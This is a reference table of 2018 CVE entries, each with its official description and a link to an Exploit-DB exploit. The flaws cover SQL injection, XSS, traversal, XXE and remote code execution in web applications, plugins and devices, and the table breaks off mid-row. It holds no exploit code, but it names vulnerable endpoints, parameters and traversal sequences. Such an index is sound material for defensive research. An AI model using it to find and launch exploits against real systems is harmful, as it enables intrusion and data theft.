# CVE-2018

<table><thead><tr><th width="173.79998779296875">CVE</th><th width="359.800048828125">CVE Description</th><th>Reference</th></tr></thead><tbody><tr><td>CVE-2018-1000811</td><td>Bludit version 3.0.0 contains an Unrestricted Upload of File with Dangerous Type vulnerability in Content Upload in the Pages Editor that can result in Remote Command Execution. This attack appears to be exploitable by a malicious user uploading a crafted payload containing PHP code.</td><td><a href="https://www.exploit-db.com/exploits/46060">https://www.exploit-db.com/exploits/46060</a></td></tr><tr><td>CVE-2018-20418</td><td>index.php?p=admin/actions/entries/save-entry in Craft CMS 3.0.25 allows XSS by saving a new title from the console tab.</td><td><a href="https://www.exploit-db.com/exploits/46054">https://www.exploit-db.com/exploits/46054</a></td></tr><tr><td>CVE-2018-1821</td><td>IBM Operational Decision Management 8.5, 8.6, 8.7, 8.8, and 8.9 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. 
IBM X-Force ID: 150170.</td><td><a href="https://www.exploit-db.com/exploits/46017">https://www.exploit-db.com/exploits/46017</a></td></tr><tr><td>CVE-2018-13045</td><td>SQL injection vulnerability in the "Bazar" page in Yeswiki Cercopitheque 2018-06-19-1 and earlier allows attackers to execute arbitrary SQL commands via the "id" parameter.</td><td><a href="https://www.exploit-db.com/exploits/46015">https://www.exploit-db.com/exploits/46015</a></td></tr><tr><td>CVE-2018-19933</td><td>Bolt CMS &#x3C;3.6.2 allows XSS via text input click preview button as demonstrated by the Title field of a Configured and New Entry.</td><td><a href="https://www.exploit-db.com/exploits/46014">https://www.exploit-db.com/exploits/46014</a></td></tr><tr><td>CVE-2018-19829</td><td>Artica Integria IMS 5.0.83 has CSRF in godmode/usuarios/lista_usuarios, resulting in the ability to delete an arbitrary user when the ID number is known.</td><td><a href="https://www.exploit-db.com/exploits/46013">https://www.exploit-db.com/exploits/46013</a></td></tr><tr><td>CVE-2018-19828</td><td>Artica Integria IMS 5.0.83 has XSS via the search_string parameter.</td><td><a href="https://www.exploit-db.com/exploits/46012">https://www.exploit-db.com/exploits/46012</a></td></tr><tr><td>CVE-2018-15535</td><td>/filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize get_file sequences such as ".." 
that can resolve to a location that is outside of that directory, aka Directory Traversal.</td><td><a href="https://www.exploit-db.com/exploits/45271">https://www.exploit-db.com/exploits/45271</a></td></tr><tr><td>CVE-2018-15877</td><td>The Plainview Activity Monitor plugin before 20180826 for WordPress is vulnerable to OS command injection via shell metacharacters in the ip parameter of a wp-admin/admin.php?page=plainview_activity_monitor&#x26;tab=activity_tools request.</td><td><a href="https://www.exploit-db.com/exploits/45274">https://www.exploit-db.com/exploits/45274</a></td></tr><tr><td>CVE-2018-15745</td><td>Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.</td><td><a href="https://www.exploit-db.com/exploits/45296">https://www.exploit-db.com/exploits/45296</a></td></tr><tr><td>CVE-2018-16133</td><td>Cybrotech CyBroHttpServer 1.0.3 allows Directory Traversal via a ../ in the URI.</td><td><a href="https://www.exploit-db.com/exploits/45303">https://www.exploit-db.com/exploits/45303</a></td></tr><tr><td>CVE-2018-16134</td><td>Cybrotech CyBroHttpServer 1.0.3 allows XSS via a URI.</td><td><a href="https://www.exploit-db.com/exploits/45309">https://www.exploit-db.com/exploits/45309</a></td></tr><tr><td>CVE-2018-15844</td><td>An issue was discovered in DamiCMS 6.0.0. 
There is a CSRF vulnerability that can change the administrator account's password via /admin.php?s=/Admin/doedit.</td><td><a href="https://www.exploit-db.com/exploits/45314">https://www.exploit-db.com/exploits/45314</a></td></tr><tr><td>CVE-2018-14497</td><td>Tenda D152 ADSL routers allow XSS via a crafted SSID.</td><td><a href="https://www.exploit-db.com/exploits/45336">https://www.exploit-db.com/exploits/45336</a></td></tr><tr><td>CVE-2018-15917</td><td>Persistent cross-site scripting (XSS) issues in Jorani 0.6.5 allow remote attackers to inject arbitrary web script or HTML via the language parameter to session/language.</td><td><a href="https://www.exploit-db.com/exploits/45338">https://www.exploit-db.com/exploits/45338</a></td></tr><tr><td>CVE-2018-15918</td><td>An issue was discovered in Jorani 0.6.5. SQL Injection (error-based) allows a user of the application without permissions to read and modify sensitive information from the database used by the application via the startdate or enddate parameter to leaves/validate.</td><td><a href="https://www.exploit-db.com/exploits/45340">https://www.exploit-db.com/exploits/45340</a></td></tr><tr><td>CVE-2018-16059</td><td>Endress+Hauser WirelessHART Fieldgate SWG70 3.x devices allow Directory Traversal via the fcgi-bin/wgsetcgi filename parameter.</td><td><a href="https://www.exploit-db.com/exploits/45342">https://www.exploit-db.com/exploits/45342</a></td></tr><tr><td>CVE-2018-10763</td><td>Multiple cross-site scripting (XSS) vulnerabilities in Synametrics SynaMan 4.0 build 1488 via the (1) Main heading or (2) Sub heading fields in the Partial Branding configuration page.</td><td><a href="https://www.exploit-db.com/exploits/45386">https://www.exploit-db.com/exploits/45386</a></td></tr><tr><td>CVE-2018-1756</td><td>IBM Security Identity Governance and Intelligence 5.2.3.2 and 5.2.4 is vulnerable to SQL injection. 
A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view information in the back-end database. IBM X-Force ID: 148599.</td><td><a href="https://www.exploit-db.com/exploits/45392">https://www.exploit-db.com/exploits/45392</a></td></tr><tr><td>CVE-2018-1306</td><td>The PortletV3AnnotatedDemo Multipart Portlet war file code provided in Apache Pluto version 3.0.0 could allow a remote attacker to obtain sensitive information, caused by the failure to restrict path information provided during a file upload. An attacker could exploit this vulnerability to obtain configuration data and other sensitive information.</td><td><a href="https://www.exploit-db.com/exploits/45396">https://www.exploit-db.com/exploits/45396</a></td></tr><tr><td>CVE-2018-17254</td><td>The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.</td><td><a href="https://www.exploit-db.com/exploits/45423">https://www.exploit-db.com/exploits/45423</a></td></tr><tr><td>CVE-2018-1002000</td><td>There is blind SQL injection in WordPress Arigato Autoresponder and Newsletter v2.5.1.8. These vulnerabilities require administrative privileges to exploit. 
There is an exploitable blind SQL injection vulnerability via the del_ids variable in a POST request.</td><td><a href="https://www.exploit-db.com/exploits/45434">https://www.exploit-db.com/exploits/45434</a></td></tr><tr><td>CVE-2018-1002001</td><td>There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and Newsletter v2.5.1.8. This vulnerability requires administrative privileges to exploit.</td><td><a href="https://www.exploit-db.com/exploits/45434">https://www.exploit-db.com/exploits/45434</a></td></tr><tr><td>CVE-2018-1002002</td><td>There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and Newsletter v2.5.1.8. This vulnerability requires administrative privileges to exploit.</td><td><a href="https://www.exploit-db.com/exploits/45434">https://www.exploit-db.com/exploits/45434</a></td></tr><tr><td>CVE-2018-1002003</td><td>There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and Newsletter v2.5.1.8. This vulnerability requires administrative privileges to exploit.</td><td><a href="https://www.exploit-db.com/exploits/45434">https://www.exploit-db.com/exploits/45434</a></td></tr><tr><td>CVE-2018-1002004</td><td>There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and Newsletter v2.5.1.8. This vulnerability requires administrative privileges to exploit.</td><td><a href="https://www.exploit-db.com/exploits/45434">https://www.exploit-db.com/exploits/45434</a></td></tr><tr><td>CVE-2018-1002005</td><td>These vulnerabilities require administrative privileges to exploit. There is an XSS vulnerability in bft_list.html.php:43: via the filter_signup_date parameter.</td><td><a href="https://www.exploit-db.com/exploits/45434">https://www.exploit-db.com/exploits/45434</a></td></tr><tr><td>CVE-2018-1002006</td><td>These vulnerabilities require administrative privileges to exploit. 
There is an XSS vulnerability in integration-contact-form.html.php:14: via the POST request variable classes.</td><td><a href="https://www.exploit-db.com/exploits/45434">https://www.exploit-db.com/exploits/45434</a></td></tr><tr><td>CVE-2018-1002007</td><td>There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and Newsletter v2.5.1.8. This vulnerability requires administrative privileges to exploit. There is an XSS vulnerability in integration-contact-form.html.php:15: via the POST request variable html_id.</td><td><a href="https://www.exploit-db.com/exploits/45434">https://www.exploit-db.com/exploits/45434</a></td></tr><tr><td>CVE-2018-1002008</td><td>There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and Newsletter v2.5.1.8. This vulnerability requires administrative privileges to exploit. There is an XSS vulnerability in list-user.html.php:4: via the GET request offset variable.</td><td><a href="https://www.exploit-db.com/exploits/45434">https://www.exploit-db.com/exploits/45434</a></td></tr><tr><td>CVE-2018-1002009</td><td>There is a reflected XSS vulnerability in WordPress Arigato Autoresponder and Newsletter v2.5.1.8. This vulnerability requires administrative privileges to exploit. 
There is an XSS vulnerability in unsubscribe.html.php:3: via a GET request to the email variable.</td><td><a href="https://www.exploit-db.com/exploits/45434">https://www.exploit-db.com/exploits/45434</a></td></tr><tr><td>CVE-2018-16736</td><td>In the rcfilters plugin 2.1.6 for Roundcube, XSS exists via the _whatfilter and _messages parameters (in the Filters section of the settings).</td><td><a href="https://www.exploit-db.com/exploits/45437">https://www.exploit-db.com/exploits/45437</a></td></tr><tr><td>CVE-2018-16283</td><td>The Wechat Broadcast plugin 1.2.0 and earlier for WordPress allows Directory Traversal via the Image.php url parameter.</td><td><a href="https://www.exploit-db.com/exploits/45438">https://www.exploit-db.com/exploits/45438</a></td></tr><tr><td>CVE-2018-16299</td><td>The Localize My Post plugin 1.0 for WordPress allows Directory Traversal via the ajax/include.php file parameter.</td><td><a href="https://www.exploit-db.com/exploits/45439">https://www.exploit-db.com/exploits/45439</a></td></tr><tr><td>CVE-2018-17255</td><td>Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2020-14014. Reason: This candidate is a reservation duplicate of CVE-2020-14014. Notes: All CVE users should reference CVE-2020-14014 instead of this candidate. 
All references and descriptions in this candidate have been removed to prevent accidental usage.</td><td><a href="https://www.exploit-db.com/exploits/45445">https://www.exploit-db.com/exploits/45445</a></td></tr><tr><td>CVE-2018-16288</td><td>LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs.</td><td><a href="https://www.exploit-db.com/exploits/45440">https://www.exploit-db.com/exploits/45440</a></td></tr><tr><td>CVE-2018-17173</td><td>LG SuperSign CMS allows remote attackers to execute arbitrary code via the sourceUri parameter to qsr_server/device/getThumbnail.</td><td><a href="https://www.exploit-db.com/exploits/45448">https://www.exploit-db.com/exploits/45448</a></td></tr><tr><td>CVE-2018-17128</td><td>A Persistent XSS issue was discovered in the Visual Editor in MyBB before 1.8.19 via a Video MyCode.</td><td><a href="https://www.exploit-db.com/exploits/45449">https://www.exploit-db.com/exploits/45449</a></td></tr><tr><td>CVE-2018-17391</td><td>SQL Injection exists in authors_post.php in Super Cms Blog Pro 1.0 via the author parameter.</td><td><a href="https://www.exploit-db.com/exploits/45463">https://www.exploit-db.com/exploits/45463</a></td></tr><tr><td>CVE-2018-17379</td><td>SQL Injection exists in the Raffle Factory 3.5.2 component for Joomla! via the filter_order_Dir or filter_order parameter.</td><td><a href="https://www.exploit-db.com/exploits/45464">https://www.exploit-db.com/exploits/45464</a></td></tr><tr><td>CVE-2018-2791</td><td>Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Advanced UI). Supported versions that are affected are 11.1.1.8.0, 12.2.1.2.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebCenter Sites. 
Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Sites, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data as well as unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).</td><td><a href="https://www.exploit-db.com/exploits/44752">https://www.exploit-db.com/exploits/44752</a></td></tr><tr><td>CVE-2018-11415</td><td>SAP Internet Transaction Server (ITS) 6200.X.X has Reflected Cross Site Scripting (XSS) via certain wgate URIs. NOTE: the vendor has reportedly indicated that there will not be any further releases of this product.</td><td><a href="https://www.exploit-db.com/exploits/44755">https://www.exploit-db.com/exploits/44755</a></td></tr><tr><td>CVE-2018-7312</td><td>SQL Injection exists in the Alexandria Book Library 3.1.2 component for Joomla! via the letter parameter.</td><td><a href="https://www.exploit-db.com/exploits/44162">https://www.exploit-db.com/exploits/44162</a></td></tr><tr><td>CVE-2018-7318</td><td>SQL Injection exists in the CheckList 1.1.1 component for Joomla! 
via the title_search, tag_search, name_search, description_search, or filter_order parameter.</td><td><a href="https://www.exploit-db.com/exploits/44163">https://www.exploit-db.com/exploits/44163</a></td></tr><tr><td>CVE-2018-6222</td><td>Arbitrary logs location in Trend Micro Email Encryption Gateway 5.5 could allow an attacker to change location of log files and be manipulated to execute arbitrary commands and attain command execution on a vulnerable system.</td><td><a href="https://www.exploit-db.com/exploits/44166">https://www.exploit-db.com/exploits/44166</a></td></tr><tr><td>CVE-2018-6223</td><td>A missing authentication for appliance registration vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an attacker to manipulate the registration process of the product to reset configuration parameters.</td><td><a href="https://www.exploit-db.com/exploits/44166">https://www.exploit-db.com/exploits/44166</a></td></tr><tr><td>CVE-2018-6225</td><td>An XML external entity injection (XXE) vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an authenticated user to expose a normally protected configuration script.</td><td><a href="https://www.exploit-db.com/exploits/44166">https://www.exploit-db.com/exploits/44166</a></td></tr><tr><td>CVE-2018-6226</td><td>Reflected cross-site scripting (XSS) vulnerabilities in two Trend Micro Email Encryption Gateway 5.5 configuration files could allow an attacker to inject client-side scripts into vulnerable systems.</td><td><a href="https://www.exploit-db.com/exploits/44166">https://www.exploit-db.com/exploits/44166</a></td></tr><tr><td>CVE-2018-6227</td><td>A stored cross-site scripting (XSS) vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an attacker to inject client-side scripts into vulnerable systems.</td><td><a href="https://www.exploit-db.com/exploits/44166">https://www.exploit-db.com/exploits/44166</a></td></tr><tr><td>CVE-2018-6228</td><td>A SQL injection vulnerability 
in a Trend Micro Email Encryption Gateway 5.5 policy script could allow an attacker to execute SQL commands to upload and execute arbitrary code that may harm the target system.</td><td><a href="https://www.exploit-db.com/exploits/44166">https://www.exploit-db.com/exploits/44166</a></td></tr><tr><td>CVE-2018-6229</td><td>A SQL injection vulnerability in a Trend Micro Email Encryption Gateway 5.5 edit policy script could allow an attacker to execute SQL commands to upload and execute arbitrary code that may harm the target system.</td><td><a href="https://www.exploit-db.com/exploits/44166">https://www.exploit-db.com/exploits/44166</a></td></tr><tr><td>CVE-2018-7600</td><td>Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.</td><td><a href="https://www.exploit-db.com/exploits/44449">https://www.exploit-db.com/exploits/44449</a></td></tr><tr><td>CVE-2018-6230</td><td>A SQL injection vulnerability in a Trend Micro Email Encryption Gateway 5.5 search configuration script could allow an attacker to execute SQL commands to upload and execute arbitrary code that may harm the target system.</td><td><a href="https://www.exploit-db.com/exploits/44166">https://www.exploit-db.com/exploits/44166</a></td></tr><tr><td>CVE-2018-7477</td><td>SQL Injection exists in PHP Scripts Mall School Management Script 3.0.4 via the Username and Password fields to parents/Parent_module/parent_login.php.</td><td><a href="https://www.exploit-db.com/exploits/44191">https://www.exploit-db.com/exploits/44191</a></td></tr><tr><td>CVE-2018-7448</td><td>Remote code execution vulnerability in /cmsms-2.1.6-install.php/index.php in CMS Made Simple version 2.1.6 allows remote attackers to inject arbitrary PHP code via the "timezone" parameter in step 4 of a fresh installation procedure.</td><td><a href="https://www.exploit-db.com/exploits/44192">https://www.exploit-db.com/exploits/44192</a></td></tr><tr><td>CVE-2018-6193</td><td>A Cross-Site Scripting (XSS) vulnerability was found in Routers2 2.24, affecting the 'rtr' GET parameter in a page=graph action to cgi-bin/routers2.pl.</td><td><a href="https://www.exploit-db.com/exploits/44216">https://www.exploit-db.com/exploits/44216</a></td></tr><tr><td>CVE-2018-6936</td><td>Cross Site Scripting (XSS) exists on the D-Link DIR-600M C1 3.01 via the SSID or the name of a user account.</td><td><a href="https://www.exploit-db.com/exploits/44219">https://www.exploit-db.com/exploits/44219</a></td></tr><tr><td>CVE-2018-7490</td><td>uWSGI before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, allowing directory traversal.</td><td><a href="https://www.exploit-db.com/exploits/44223">https://www.exploit-db.com/exploits/44223</a></td></tr><tr><td>CVE-2018-7474</td><td>An issue was discovered in Textpattern CMS 4.6.2 and earlier. It is possible to inject SQL code in the variable "qty" on the page index.php.</td><td><a href="https://www.exploit-db.com/exploits/44277">https://www.exploit-db.com/exploits/44277</a></td></tr><tr><td>CVE-2018-7703</td><td>Cross-site scripting (XSS) vulnerability in SecurEnvoy SecurMail before 9.2.501 allows remote attackers to inject arbitrary web script or HTML via the mailboxid parameter to secmail/getmessage.exe.</td><td><a href="https://www.exploit-db.com/exploits/44285">https://www.exploit-db.com/exploits/44285</a></td></tr><tr><td>CVE-2018-7705</td><td>Directory traversal vulnerability in SecurEnvoy SecurMail before 9.2.501 allows remote authenticated users to read e-mail messages to arbitrary recipients via a .. 
(dot dot) in the filename parameter to secupload2/upload.aspx.</td><td><a href="https://www.exploit-db.com/exploits/44285">https://www.exploit-db.com/exploits/44285</a></td></tr><tr><td>CVE-2018-7701</td><td>Multiple cross-site request forgery (CSRF) vulnerabilities in SecurEnvoy SecurMail before 9.2.501 allow remote attackers to hijack the authentication of arbitrary users for requests that (1) delete e-mail messages via a delete action in a request to secmail/getmessage.exe or (2) spoof arbitrary users and reply to their messages via a request to secserver/securectrl.exe.</td><td><a href="https://www.exploit-db.com/exploits/44285">https://www.exploit-db.com/exploits/44285</a></td></tr><tr><td>CVE-2018-7538</td><td>SQL injection vulnerability in the tracker functionality of Enalean Tuleap software engineering platform before 9.18 allows attackers to execute arbitrary SQL commands.</td><td><a href="https://www.exploit-db.com/exploits/44286">https://www.exploit-db.com/exploits/44286</a></td></tr><tr><td>CVE-2018-7543</td><td>Cross-site scripting (XSS) vulnerability in installer/build/view.step4.php of the SnapCreek Duplicator plugin 1.2.32 for WordPress allows remote attackers to inject arbitrary JavaScript or HTML via the json parameter.</td><td><a href="https://www.exploit-db.com/exploits/44288">https://www.exploit-db.com/exploits/44288</a></td></tr><tr><td>CVE-2018-8772</td><td>Coship RT3052 4.0.0.48 devices allow XSS via a crafted SSID field on the "Wireless Setting - Basic" screen.</td><td><a href="https://www.exploit-db.com/exploits/44320">https://www.exploit-db.com/exploits/44320</a></td></tr><tr><td>CVE-2018-7422</td><td>A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php, aka absolute path traversal.</td><td><a 
href="https://www.exploit-db.com/exploits/44340">https://www.exploit-db.com/exploits/44340</a></td></tr><tr><td>CVE-2018-7171</td><td>Directory traversal vulnerability in Twonky Server 7.0.11 through 8.5 allows remote attackers to share the contents of arbitrary directories via a .. (dot dot) in the contentbase parameter to rpc/set_all.</td><td><a href="https://www.exploit-db.com/exploits/44350">https://www.exploit-db.com/exploits/44350</a></td></tr><tr><td>CVE-2018-7203</td><td>Cross-site scripting (XSS) vulnerability in Twonky Server 7.0.11 through 8.5 allows remote attackers to inject arbitrary web script or HTML via the friendlyname parameter to rpc/set_all.</td><td><a href="https://www.exploit-db.com/exploits/44351">https://www.exploit-db.com/exploits/44351</a></td></tr><tr><td>CVE-2018-0878</td><td>Windows Remote Assistance in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and 1709, Windows Server 2016 and Windows Server, version 1709 allows an information disclosure vulnerability due to how XML External Entities (XXE) are processed, aka "Windows Remote Assistance Information Disclosure Vulnerability".</td><td><a href="https://www.exploit-db.com/exploits/44352">https://www.exploit-db.com/exploits/44352</a></td></tr><tr><td>CVE-2018-8903</td><td>Open-AudIT Professional 2.1 allows XSS via the Name or Description field on the Credentials screen.</td><td><a href="https://www.exploit-db.com/exploits/44354">https://www.exploit-db.com/exploits/44354</a></td></tr><tr><td>CVE-2018-8979</td><td>Open-AudIT Professional 2.1 has CSRF, as demonstrated by modifying a user account or inserting XSS sequences via the credentials URI.</td><td><a href="https://www.exploit-db.com/exploits/44360">https://www.exploit-db.com/exploits/44360</a></td></tr><tr><td>CVE-2018-9034</td><td>Cross-site scripting (XSS) vulnerability in lib/interface.php of the Relevanssi plugin 4.0.4 for 
WordPress allows remote attackers to inject arbitrary JavaScript or HTML via the tab GET parameter.</td><td><a href="https://www.exploit-db.com/exploits/44366">https://www.exploit-db.com/exploits/44366</a></td></tr><tr><td>CVE-2018-9035</td><td>CSV Injection vulnerability in ExportToCsvUtf8.php of the Contact Form 7 to Database Extension plugin 2.10.32 for WordPress allows remote attackers to inject spreadsheet formulas into CSV files via the contact form.</td><td><a href="https://www.exploit-db.com/exploits/44367">https://www.exploit-db.com/exploits/44367</a></td></tr><tr><td>CVE-2018-7297</td><td>Remote Code Execution in the TCL script interpreter in eQ-3 AG Homematic CCU2 2.29.2 and earlier allows remote attackers to obtain read/write access and execute system commands on the device. This vulnerability can be exploited by unauthenticated attackers with access to the web interface.</td><td><a href="https://www.exploit-db.com/exploits/44368">https://www.exploit-db.com/exploits/44368</a></td></tr><tr><td>CVE-2018-9107</td><td>CSV Injection (aka Excel Macro Injection or Formula Injection) exists in the export feature in the Acyba AcyMailing extension before 5.9.6 for Joomla! via a value that is mishandled in a CSV export.</td><td><a href="https://www.exploit-db.com/exploits/44369">https://www.exploit-db.com/exploits/44369</a></td></tr><tr><td>CVE-2018-9106</td><td>CSV Injection (aka Excel Macro Injection or Formula Injection) exists in the export feature in the Acyba AcySMS extension before 3.5.1 for Joomla! via a value that is mishandled in a CSV export.</td><td><a href="https://www.exploit-db.com/exploits/44370">https://www.exploit-db.com/exploits/44370</a></td></tr><tr><td>CVE-2018-5708</td><td>An issue was discovered on D-Link DIR-601 B1 2.02NA devices. 
Being on the same local network as, but being unauthenticated to, the administrator's panel, a user can obtain the admin username and cleartext password in the response (specifically, the configuration file restore_default), which is displayed in XML.</td><td><a href="https://www.exploit-db.com/exploits/44388">https://www.exploit-db.com/exploits/44388</a></td></tr><tr><td>CVE-2018-8815</td><td>Cross-site scripting (XSS) vulnerability in the gallery function in Alkacon OpenCMS 10.5.3 allows remote attackers to inject arbitrary web script or HTML via a malicious SVG image.</td><td><a href="https://www.exploit-db.com/exploits/44392">https://www.exploit-db.com/exploits/44392</a></td></tr><tr><td>CVE-2018-9183</td><td>The Joom Sky JS Jobs extension before 1.2.1 for Joomla! has XSS.</td><td><a href="https://www.exploit-db.com/exploits/44401">https://www.exploit-db.com/exploits/44401</a></td></tr><tr><td>CVE-2018-7653</td><td>In YzmCMS 3.6, index.php has XSS via the a, c, or m parameter.</td><td><a href="https://www.exploit-db.com/exploits/44405">https://www.exploit-db.com/exploits/44405</a></td></tr><tr><td>CVE-2018-7736</td><td>In Z-BlogPHP 1.5.1.1740, cmd.php has XSS via the ZC_BLOG_SUBNAME parameter or ZC_UPLOAD_FILETYPE parameter. 
NOTE: the software maintainer disputes that this is a vulnerability.</td><td><a href="https://www.exploit-db.com/exploits/44406">https://www.exploit-db.com/exploits/44406</a></td></tr><tr><td>CVE-2018-9173</td><td>Cross-site scripting (XSS) vulnerability in admin/template/js/uploadify/uploadify.swf in GetSimple CMS 3.3.13 allows remote attackers to inject arbitrary web script or HTML, as demonstrated by the movieName parameter.</td><td><a href="https://www.exploit-db.com/exploits/44408">https://www.exploit-db.com/exploits/44408</a></td></tr><tr><td>CVE-2018-8729</td><td>Multiple cross-site scripting (XSS) vulnerabilities in the Activity Log plugin before 2.4.1 for WordPress allow remote attackers to inject arbitrary JavaScript or HTML via a title that is not escaped.</td><td><a href="https://www.exploit-db.com/exploits/44409">https://www.exploit-db.com/exploits/44409</a></td></tr><tr><td>CVE-2018-7746</td><td>An issue was discovered in Western Bridge Cobub Razor 0.7.2. Authentication is not required for /index.php?/manage/channel/modifychannel. 
For example, with a crafted channel name, stored XSS is triggered during a later /index.php?/manage/channel request by an admin.</td><td><a href="https://www.exploit-db.com/exploits/44416">https://www.exploit-db.com/exploits/44416</a></td></tr><tr><td>CVE-2018-9238</td><td>proberv.php in Yahei-PHP Proberv 0.4.7 has XSS via the funName parameter.</td><td><a href="https://www.exploit-db.com/exploits/44424">https://www.exploit-db.com/exploits/44424</a></td></tr><tr><td>CVE-2018-9235</td><td>iScripts SonicBB 1.0 has Reflected Cross-Site Scripting via the query parameter to search.php.</td><td><a href="https://www.exploit-db.com/exploits/44434">https://www.exploit-db.com/exploits/44434</a></td></tr><tr><td>CVE-2018-9236</td><td>iScripts EasyCreate 3.2.1 has Stored Cross-Site Scripting in the "Site title" field.</td><td><a href="https://www.exploit-db.com/exploits/44436">https://www.exploit-db.com/exploits/44436</a></td></tr><tr><td>CVE-2018-9237</td><td>iScripts EasyCreate 3.2.1 has Stored Cross-Site Scripting in the "Site Description" field.</td><td><a href="https://www.exploit-db.com/exploits/44436">https://www.exploit-db.com/exploits/44436</a></td></tr><tr><td>CVE-2018-8729</td><td>Multiple cross-site scripting (XSS) vulnerabilities in the Activity Log plugin before 2.4.1 for WordPress allow remote attackers to inject arbitrary JavaScript or HTML via a title that is not escaped.</td><td><a href="https://www.exploit-db.com/exploits/44437">https://www.exploit-db.com/exploits/44437</a></td></tr><tr><td>CVE-2018-1217</td><td>Avamar Installation Manager in Dell EMC Avamar Server 7.3.1, 7.4.1, and 7.5.0, and Dell EMC Integrated Data Protection Appliance 2.0 and 2.1, is affected by a missing access control check vulnerability which could potentially allow a remote unauthenticated attacker to read or change the Local Download Service (LDLS) credentials. The LDLS credentials are used to connect to Dell EMC Online Support. 
If the LDLS configuration was changed to an invalid configuration, then Avamar Installation Manager may not be able to connect to Dell EMC Online Support web site successfully. The remote unauthenticated attacker can also read and use the credentials to login to Dell EMC Online Support, impersonating the AVI service actions using those credentials.</td><td><a href="https://www.exploit-db.com/exploits/44441">https://www.exploit-db.com/exploits/44441</a></td></tr><tr><td>CVE-2018-9172</td><td>The Iptanus WordPress File Upload plugin before 4.3.3 for WordPress mishandles shortcode attributes.</td><td><a href="https://www.exploit-db.com/exploits/44443">https://www.exploit-db.com/exploits/44443</a></td></tr><tr><td>CVE-2018-9844</td><td>The Iptanus WordPress File Upload plugin before 4.3.4 for WordPress mishandles Settings attributes, leading to XSS.</td><td><a href="https://www.exploit-db.com/exploits/44444">https://www.exploit-db.com/exploits/44444</a></td></tr><tr><td>CVE-2018-10063</td><td>The Convert Forms extension before 2.0.4 for Joomla! 
is vulnerable to Remote Command Execution using CSV Injection that is mishandled when exporting a Leads file.</td><td><a href="https://www.exploit-db.com/exploits/44447">https://www.exploit-db.com/exploits/44447</a></td></tr><tr><td>CVE-2018-8057</td><td>A SQL Injection vulnerability exists in Western Bridge Cobub Razor 0.8.0 via the channel_name or platform parameter in a /index.php?/manage/channel/addchannel request, related to /application/controllers/manage/channel.php.</td><td><a href="https://www.exploit-db.com/exploits/44454">https://www.exploit-db.com/exploits/44454</a></td></tr><tr><td>CVE-2018-9857</td><td>PHP Scripts Mall Match Clone Script 1.0.4 has XSS via the search field to searchbyid.php (aka the "View Search By Id" screen).</td><td><a href="https://www.exploit-db.com/exploits/44486">https://www.exploit-db.com/exploits/44486</a></td></tr><tr><td>CVE-2018-8831</td><td>A Persistent XSS vulnerability exists in Kodi (formerly XBMC) through 17.6 that allows the execution of arbitrary HTML/script code in the context of the victim user's browser via a playlist.</td><td><a href="https://www.exploit-db.com/exploits/44487">https://www.exploit-db.com/exploits/44487</a></td></tr><tr><td>CVE-2018-7747</td><td>Multiple cross-site scripting (XSS) vulnerabilities in the Caldera Forms plugin before 1.6.0-rc.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) a greeting message, (2) the email transaction log, or (3) an imported form.</td><td><a href="https://www.exploit-db.com/exploits/44489">https://www.exploit-db.com/exploits/44489</a></td></tr><tr><td>CVE-2018-10077</td><td>XML external entity (XXE) vulnerability in Geist WatchDog Console 3.2.2 allows remote authenticated administrators to read arbitrary files via crafted XML data.</td><td><a href="https://www.exploit-db.com/exploits/44493">https://www.exploit-db.com/exploits/44493</a></td></tr><tr><td>CVE-2018-10078</td><td>Cross-site scripting (XSS) 
